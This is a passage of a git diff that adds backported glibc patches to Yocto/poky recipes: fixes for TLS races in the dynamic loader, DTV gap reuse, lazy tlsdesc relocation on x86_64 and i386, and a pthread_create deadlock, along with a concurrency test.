file mode 100644 index 0000000000..eb8ef3161c --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch @@ -0,0 +1,206 @@ +From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy +Date: Wed, 30 Dec 2020 19:19:37 +0000 +Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329] + +This is a follow up patch to the fix for bug 19329. This adds relaxed +MO atomics to accesses that were previously data races but are now +race conditions, and where relaxed MO is sufficient. + +The race conditions all follow the pattern that the write is behind the +dlopen lock, but a read can happen concurrently (e.g. during tls access) +without holding the lock. For slotinfo entries the read value only +matters if it reads from a synchronized write in dlopen or dlclose, +otherwise the related dtv entry is not valid to access so it is fine +to leave it in an inconsistent state. The same applies for +GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the +algorithm relies on the fact that the read of the last synchronized +write is an increasing value. + +Reviewed-by: Adhemerval Zanella +--- + elf/dl-close.c | 20 +++++++++++++------- + elf/dl-open.c | 5 ++++- + elf/dl-tls.c | 31 +++++++++++++++++++++++-------- + sysdeps/x86_64/dl-tls.c | 3 ++- + 4 files changed, 42 insertions(+), 17 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9] +Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change. +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index c51becd06b..3720e47dd1 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + { + assert (old_map->l_tls_modid == idx); + +- /* Mark the entry as unused. */ +- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1; +- listp->slotinfo[idx - disp].map = NULL; ++ /* Mark the entry as unused. These can be read concurrently. */ ++ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen, ++ GL(dl_tls_generation) + 1); ++ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL); + } + + /* If this is not the last currently used entry no need to look +@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + + if (listp->slotinfo[idx - disp].map != NULL) + { +- /* Found a new last used index. */ +- GL(dl_tls_max_dtv_idx) = idx; ++ /* Found a new last used index. This can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx); + return true; + } + } +@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force) + GL(dl_tls_dtv_slotinfo_list), 0, + imap->l_init_called)) + /* All dynamically loaded modules with TLS are unloaded. */ +- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem); ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), ++ GL(dl_tls_static_nelem)); + + if (imap->l_tls_offset != NO_TLS_OFFSET + && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET) +@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force) + /* If we removed any object which uses TLS bump the generation counter. */ + if (any_tls) + { +- if (__glibc_unlikely (++GL(dl_tls_generation) == 0)) ++ size_t newgen = GL(dl_tls_generation) + 1; ++ if (__glibc_unlikely (newgen == 0)) + _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n"); ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_generation), newgen); + + if (tls_free_end == GL(dl_tls_static_used)) + GL(dl_tls_static_used) = tls_free_start; +diff --git a/elf/dl-open.c b/elf/dl-open.c +index 09f0df7d38..bb79ef00f1 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -387,9 +387,12 @@ + } + } + +- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0)) ++ size_t newgen = GL(dl_tls_generation) + 1; ++ if (__glibc_unlikely (newgen == 0)) + _dl_fatal_printf (N_("\ + TLS generation counter wrapped! Please report this.")); ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_generation), newgen); + + /* We need a second pass for static tls data, because + _dl_update_slotinfo must not be run while calls to +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 94f3cdbae0..dc69cd984e 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -96,7 +96,9 @@ + /* No gaps, allocate a new entry. */ + nogaps: + +- result = ++GL(dl_tls_max_dtv_idx); ++ result = GL(dl_tls_max_dtv_idx) + 1; ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result); + } + + return result; +@@ -279,10 +281,12 @@ + dtv_t *dtv; + size_t dtv_length; + ++ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */ ++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx)); + /* We allocate a few more elements in the dtv than are needed for the + initial set of modules. This should avoid in most cases expansions + of the dtv. */ +- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS; ++ dtv_length = max_modid + DTV_SURPLUS; + dtv = calloc (dtv_length + 2, sizeof (dtv_t)); + if (dtv != NULL) + { +@@ -687,7 +691,7 @@ + if (modid > max_modid) + break; + +- size_t gen = listp->slotinfo[cnt].gen; ++ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen); + + if (gen > new_gen) + /* Not relevant. */ +@@ -699,7 +703,8 @@ + continue; + + /* If there is no map this means the entry is empty. */ +- struct link_map *map = listp->slotinfo[cnt].map; ++ struct link_map *map ++ = atomic_load_relaxed (&listp->slotinfo[cnt].map); + /* Check whether the current dtv array is large enough. */ + if (dtv[-1].counter < modid) + { +@@ -843,7 +848,12 @@ + { + dtv_t *dtv = THREAD_DTV (); + +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ /* Update is needed if dtv[0].counter < the generation of the accessed ++ module. The global generation counter is used here as it is easier ++ to check. Synchronization for the relaxed MO access is guaranteed ++ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */ ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + return update_get_addr (GET_ADDR_PARAM); + + void *p = dtv[GET_ADDR_MODULE].pointer.val; +@@ -866,7 +876,10 @@ + return NULL; + + dtv_t *dtv = THREAD_DTV (); +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ /* This may be called without holding the GL(dl_load_lock). Reading ++ arbitrary gen value is fine since this is best effort code. */ ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + { + /* This thread's DTV is not completely current, + but it might already cover this module. */ +@@ -961,7 +974,9 @@ + /* Add the information into the slotinfo data structure. */ + if (do_add) + { +- listp->slotinfo[idx].map = l; +- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1; ++ /* Can be read concurrently. See _dl_update_slotinfo. */ ++ atomic_store_relaxed (&listp->slotinfo[idx].map, l); ++ atomic_store_relaxed (&listp->slotinfo[idx].gen, ++ GL(dl_tls_generation) + 1); + } + } + +diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c +index 6595f6615b..24ef560b71 100644 +--- a/sysdeps/x86_64/dl-tls.c ++++ b/sysdeps/x86_64/dl-tls.c +@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS) + { + dtv_t *dtv = THREAD_DTV (); + +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + return update_get_addr (GET_ADDR_PARAM); + + return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL); +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch new file mode 100644 index 0000000000..f22e52ea99 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch @@ -0,0 +1,144 @@ +From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy +Date: Tue, 13 Dec 2016 12:28:41 +0000 +Subject: [PATCH] elf: Add test case for [BZ #19329] + +Test concurrent dlopen and pthread_create when the loaded modules have +TLS. This triggers dl-tls assertion failures more reliably than the +nptl/tst-stack4 test. + +The dlopened module has 100 DT_NEEDED dependencies with TLS, they were +reused from an existing TLS test. The number of created threads during +dlopen depends on filesystem speed and hardware, but at most 3 threads +are alive at a time to limit resource usage. + +Reviewed-by: Adhemerval Zanella +--- + elf/Makefile | 9 ++++-- + elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++ + elf/tst-tls21mod.c | 1 + + 3 files changed, 76 insertions(+), 2 deletions(-) + create mode 100644 elf/tst-tls21.c + create mode 100644 elf/tst-tls21mod.c +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce] +Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase. +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/elf/Makefile b/elf/Makefile +index d3e909637a..3241cb6046 100644 +--- a/elf/Makefile ++++ b/elf/Makefile +@@ -201,7 +201,7 @@ + tst-unwind-ctor tst-unwind-main tst-audit13 \ + tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \ + tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \ +- tst-dlopenfail-2 ++ tst-dlopenfail-2 tst-tls21 + # reldep9 + tests-internal += loadtest unload unload2 circleload1 \ + neededtest neededtest2 neededtest3 neededtest4 \ +@@ -312,7 +312,7 @@ + tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \ + tst-initlazyfailmod tst-finilazyfailmod \ + tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \ +- tst-dlopenfailmod3 tst-ldconfig-ld-mod ++ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod + # Most modules build with _ISOMAC defined, but those filtered out + # depend on internal headers. + modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\ +@@ -1697,5 +1697,10 @@ + $(objpfx)tst-dlopen-nodelete-reloc-mod16.so + LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed + ++# Reuses tst-tls-many-dynamic-modules ++$(objpfx)tst-tls21: $(libdl) $(shared-thread-library) ++$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so ++$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so) ++ + $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so + $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl) +diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c +new file mode 100644 +index 0000000000..560bf5813a +--- /dev/null ++++ b/elf/tst-tls21.c +@@ -0,0 +1,68 @@ ++/* Test concurrent dlopen and pthread_create: BZ 19329. ++ Copyright (C) 2021 Free Software Foundation, Inc. ++ This file is part of the GNU C Library. ++ ++ The GNU C Library is free software; you can redistribute it and/or ++ modify it under the terms of the GNU Lesser General Public ++ License as published by the Free Software Foundation; either ++ version 2.1 of the License, or (at your option) any later version. ++ ++ The GNU C Library is distributed in the hope that it will be useful, ++ but WITHOUT ANY WARRANTY; without even the implied warranty of ++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ++ Lesser General Public License for more details. ++ ++ You should have received a copy of the GNU Lesser General Public ++ License along with the GNU C Library; if not, see ++ . */ ++ ++#include ++#include ++#include ++#include ++#include ++#include ++ ++#define THREADS 10000 ++ ++static atomic_int done; ++ ++static void * ++start (void *a) ++{ ++ /* Load a module with many dependencies that each have TLS. */ ++ xdlopen ("tst-tls21mod.so", RTLD_LAZY); ++ atomic_store_explicit (&done, 1, memory_order_release); ++ return 0; ++} ++ ++static void * ++nop (void *a) ++{ ++ return 0; ++} ++ ++static int ++do_test (void) ++{ ++ pthread_t t1, t2; ++ int i; ++ ++ /* Load a module with lots of dependencies and TLS. */ ++ t1 = xpthread_create (0, start, 0); ++ ++ /* Concurrently create lots of threads until dlopen is observably done. */ ++ for (i = 0; i < THREADS; i++) ++ { ++ if (atomic_load_explicit (&done, memory_order_acquire) != 0) ++ break; ++ t2 = xpthread_create (0, nop, 0); ++ xpthread_join (t2); ++ } ++ ++ xpthread_join (t1); ++ printf ("threads created during dlopen: %d\n", i); ++ return 0; ++} ++ ++#include +diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c +new file mode 100644 +index 0000000000..206ece4fb3 +--- /dev/null ++++ b/elf/tst-tls21mod.c +@@ -0,0 +1 @@ ++int __thread x; +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch new file mode 100644 index 0000000000..a87afe3230 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch @@ -0,0 +1,180 @@ +From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001 +From: Adhemerval Zanella +Date: Fri, 25 Jun 2021 10:54:12 -0300 +Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135) + +This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2) +that fixes the _dl_next_tls_modid issues. + +This issue with 572bd547d57a patch is the DTV entry will be only +update on dl_open_worker() with the update_tls_slotinfo() call after +all dependencies are being processed by _dl_map_object_deps(). However +_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since +the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be +wrongly reused. + +This patch fixes by renaming the _dl_next_tls_modid() function to +_dl_assign_tls_modid() and by passing the link_map so it can set +the slotinfo value so a subsequente _dl_next_tls_modid() call will +see the entry as allocated. + +The intermediary value is cleared up on remove_slotinfo() for the case +a library fails to load with RTLD_NOW. + +This patch fixes BZ #27135. + +Checked on x86_64-linux-gnu. + +Reviewed-by: Szabolcs Nagy +--- + elf/dl-close.c | 8 +- + elf/dl-load.c | 2 +- + elf/dl-open.c | 10 -- + elf/dl-tls.c | 17 +-- + elf/rtld.c | 2 +- + sysdeps/generic/ldsodefs.h | 4 +- + 6 files changed, 349 insertions(+), 33 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce] +Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed. +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index 3720e47dd1..f39001cab9 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + object that wasn't fully set up. */ + if (__glibc_likely (old_map != NULL)) + { +- assert (old_map->l_tls_modid == idx); +- + /* Mark the entry as unused. These can be read concurrently. */ + atomic_store_relaxed (&listp->slotinfo[idx - disp].gen, + GL(dl_tls_generation) + 1); +@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + /* If this is not the last currently used entry no need to look + further. */ + if (idx != GL(dl_tls_max_dtv_idx)) +- return true; ++ { ++ /* There is an unused dtv entry in the middle. */ ++ GL(dl_tls_dtv_gaps) = true; ++ return true; ++ } + } + + while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0)) +diff --git a/elf/dl-load.c b/elf/dl-load.c +index a08df001af..650e4edc35 100644 +--- a/elf/dl-load.c ++++ b/elf/dl-load.c +@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires"); + not set up TLS data structures, so don't use them now. */ + || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL))) + /* Assign the next available module ID. */ +- l->l_tls_modid = _dl_next_tls_modid (); ++ _dl_assign_tls_modid (l); + + #ifdef DL_AFTER_LOAD + DL_AFTER_LOAD (l); +diff --git a/elf/dl-open.c b/elf/dl-open.c +index a066f39bd0..d2240d8747 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()")); + state if relocation failed, for example. */ + if (args.map) + { +- /* Maybe some of the modules which were loaded use TLS. +- Since it will be removed in the following _dl_close call +- we have to mark the dtv array as having gaps to fill the +- holes. This is a pessimistic assumption which won't hurt +- if not true. There is no need to do this when we are +- loading the auditing DSOs since TLS has not yet been set +- up. */ +- if ((mode & __RTLD_AUDIT) == 0) +- GL(dl_tls_dtv_gaps) = true; +- + _dl_close_worker (args.map, true); + + /* All l_nodelete_pending objects should have been deleted +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 2b5161d10a..423e380f7c 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -126,8 +126,8 @@ oom (void) + } + + +-size_t +-_dl_next_tls_modid (void) ++void ++_dl_assign_tls_modid (struct link_map *l) + { + size_t result; + +@@ -157,7 +157,11 @@ _dl_next_tls_modid (void) + } + + if (result - disp < runp->len) +- break; ++ { ++ /* Mark the entry as used, so any dependency see it. */ ++ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l); ++ break; ++ } + + disp += runp->len; + } +@@ -184,17 +188,14 @@ _dl_next_tls_modid (void) + atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result); + } + +- return result; ++ l->l_tls_modid = result; + } + + + size_t + _dl_count_modids (void) + { +- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where +- we fail to load a module and unload it leaving a gap. If we don't +- have gaps then the number of modids is the current maximum so +- return that. */ ++ /* The count is the max unless dlclose or failed dlopen created gaps. */ + if (__glibc_likely (!GL(dl_tls_dtv_gaps))) + return GL(dl_tls_max_dtv_idx); + +diff --git a/elf/rtld.c b/elf/rtld.c +index e3fb2a5b2a..d733359eaf 100644 +--- a/elf/rtld.c ++++ b/elf/rtld.c +@@ -1612,7 +1612,7 @@ + /* Add the dynamic linker to the TLS list if it also uses TLS. */ + if (GL(dl_rtld_map).l_tls_blocksize != 0) + /* Assign a module ID. Do this before loading any audit modules. */ +- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid (); ++ _dl_assign_tls_modid (&GL(dl_rtld_map)); + + /* If we have auditing DSOs to load, do it now. */ + bool need_security_init = true; +diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h +index 176394de4d..9c15259236 100644 +--- a/sysdeps/generic/ldsodefs.h ++++ b/sysdeps/generic/ldsodefs.h +@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr, + extern void _dl_sysdep_start_cleanup (void) attribute_hidden; + + +-/* Determine next available module ID. */ +-extern size_t _dl_next_tls_modid (void) attribute_hidden; ++/* Determine next available module ID and set the L l_tls_modid. */ ++extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden; + + /* Count the modules with TLS segments. */ + extern size_t _dl_count_modids (void) attribute_hidden; +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch new file mode 100644 index 0000000000..899111b118 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch @@ -0,0 +1,56 @@ +From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy +Date: Thu, 11 Feb 2021 11:29:23 +0000 +Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137] + +Lazy tlsdesc relocation is racy because the static tls optimization and +tlsdesc management operations are done without holding the dlopen lock. + +This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67 +for aarch64, but it fixes a different race: bug 27137. + +Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to +relocate tlsdesc lazily, but that does not work in a BIND_NOW module +due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at +load time fixes this bug 27721 too. +--- + sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++----- + 1 file changed, 14 insertions(+), 5 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86] +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h +index 103eee6c3f..9a876a371e 100644 +--- a/sysdeps/x86_64/dl-machine.h ++++ b/sysdeps/x86_64/dl-machine.h +@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map, + } + else if (__glibc_likely (r_type == R_X86_64_TLSDESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; ++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info); ++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]); ++ const ElfW (Sym) *sym = &symtab[symndx]; ++ const struct r_found_version *version = NULL; + +- td->arg = (void*)reloc; +- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)]) +- + map->l_addr); ++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL) ++ { ++ const ElfW (Half) *vernum = ++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ version = &map->l_versions[vernum[symndx] & 0x7fff]; ++ } ++ ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ ++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc); + } + else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE)) + { +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch new file mode 100644 index 0000000000..ad0a1147aa --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch @@ -0,0 +1,124 @@ +From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy +Date: Thu, 11 Feb 2021 11:40:11 +0000 +Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137] + +Lazy tlsdesc relocation is racy because the static tls optimization and +tlsdesc management operations are done without holding the dlopen lock. + +This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67 +for aarch64, but it fixes a different race: bug 27137. + +On i386 the code is a bit more complicated than on x86_64 because both +rel and rela relocs are supported. +--- + sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++--------------------- + 1 file changed, 34 insertions(+), 42 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d] +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h +index 23e9cc3bfb..590b41d8d7 100644 +--- a/sysdeps/i386/dl-machine.h ++++ b/sysdeps/i386/dl-machine.h +@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map, + } + else if (__glibc_likely (r_type == R_386_TLS_DESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; +- +- /* Handle relocations that reference the local *ABS* in a simple +- way, so as to preserve a potential addend. */ +- if (ELF32_R_SYM (reloc->r_info) == 0) +- td->entry = _dl_tlsdesc_resolve_abs_plus_addend; +- /* Given a known-zero addend, we can store a pointer to the +- reloc in the arg position. */ +- else if (td->arg == 0) +- { +- td->arg = (void*)reloc; +- td->entry = _dl_tlsdesc_resolve_rel; +- } +- else +- { +- /* We could handle non-*ABS* relocations with non-zero addends +- by allocating dynamically an arg to hold a pointer to the +- reloc, but that sounds pointless. */ +- const Elf32_Rel *const r = reloc; +- /* The code below was borrowed from elf_dynamic_do_rel(). */ +- const ElfW(Sym) *const symtab = +- (const void *) D_PTR (map, l_info[DT_SYMTAB]); ++ const Elf32_Rel *const r = reloc; ++ /* The code below was borrowed from elf_dynamic_do_rel(). */ ++ const ElfW(Sym) *const symtab = ++ (const void *) D_PTR (map, l_info[DT_SYMTAB]); + ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ + # ifdef RTLD_BOOTSTRAP +- /* The dynamic linker always uses versioning. */ +- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL); ++ /* The dynamic linker always uses versioning. */ ++ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL); + # else +- if (map->l_info[VERSYMIDX (DT_VERSYM)]) ++ if (map->l_info[VERSYMIDX (DT_VERSYM)]) + # endif +- { +- const ElfW(Half) *const version = +- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); +- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff; +- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], +- &map->l_versions[ndx], +- (void *) (l_addr + r->r_offset), skip_ifunc); +- } ++ { ++ const ElfW(Half) *const version = ++ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff; ++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], ++ &map->l_versions[ndx], ++ (void *) (l_addr + r->r_offset), skip_ifunc); ++ } + # ifndef RTLD_BOOTSTRAP +- else +- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL, +- (void *) (l_addr + r->r_offset), skip_ifunc); ++ else ++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL, ++ (void *) (l_addr + r->r_offset), skip_ifunc); + # endif +- } + } + else if (__glibc_unlikely (r_type == R_386_IRELATIVE)) + { +@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map, + ; + else if (__glibc_likely (r_type == R_386_TLS_DESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; ++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info); ++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]); ++ const ElfW (Sym) *sym = &symtab[symndx]; ++ const struct r_found_version *version = NULL; ++ ++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL) ++ { ++ const ElfW (Half) *vernum = ++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ version = &map->l_versions[vernum[symndx] & 0x7fff]; ++ } + +- td->arg = (void*)reloc; +- td->entry = _dl_tlsdesc_resolve_rela; ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ ++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc); + } + else if (__glibc_unlikely (r_type == R_386_IRELATIVE)) + { +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch new file mode 100644 index 0000000000..7a10131bad --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch @@ -0,0 +1,276 @@ +From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy +Date: Wed, 15 Sep 2021 15:16:19 +0100 +Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ + #28357] + +The fix for bug 19329 caused a regression such that pthread_create can +deadlock when concurrent ctors from dlopen are waiting for it to finish. +Use a new GL(dl_load_tls_lock) in pthread_create that is not taken +around ctors in dlopen. + +The new lock is also used in __tls_get_addr instead of GL(dl_load_lock). + +The new lock is held in _dl_open_worker and _dl_close_worker around +most of the logic before/after the init/fini routines. When init/fini +routines are running then TLS is in a consistent, usable state. +In _dl_open_worker the new lock requires catching and reraising dlopen +failures that happen in the critical section. + +The new lock is reinitialized in a fork child, to keep the existing +behaviour and it is kept recursive in case malloc interposition or TLS +access from signal handlers can retake it. It is not obvious if this +is necessary or helps, but avoids changing the preexisting behaviour. + +The new lock may be more appropriate for dl_iterate_phdr too than +GL(dl_load_write_lock), since TLS state of an incompletely loaded +module may be accessed. If the new lock can replace the old one, +that can be a separate change. + +Fixes bug 28357. + +Reviewed-by: Adhemerval Zanella +--- + elf/dl-close.c | 6 ++ + elf/dl-open.c | 35 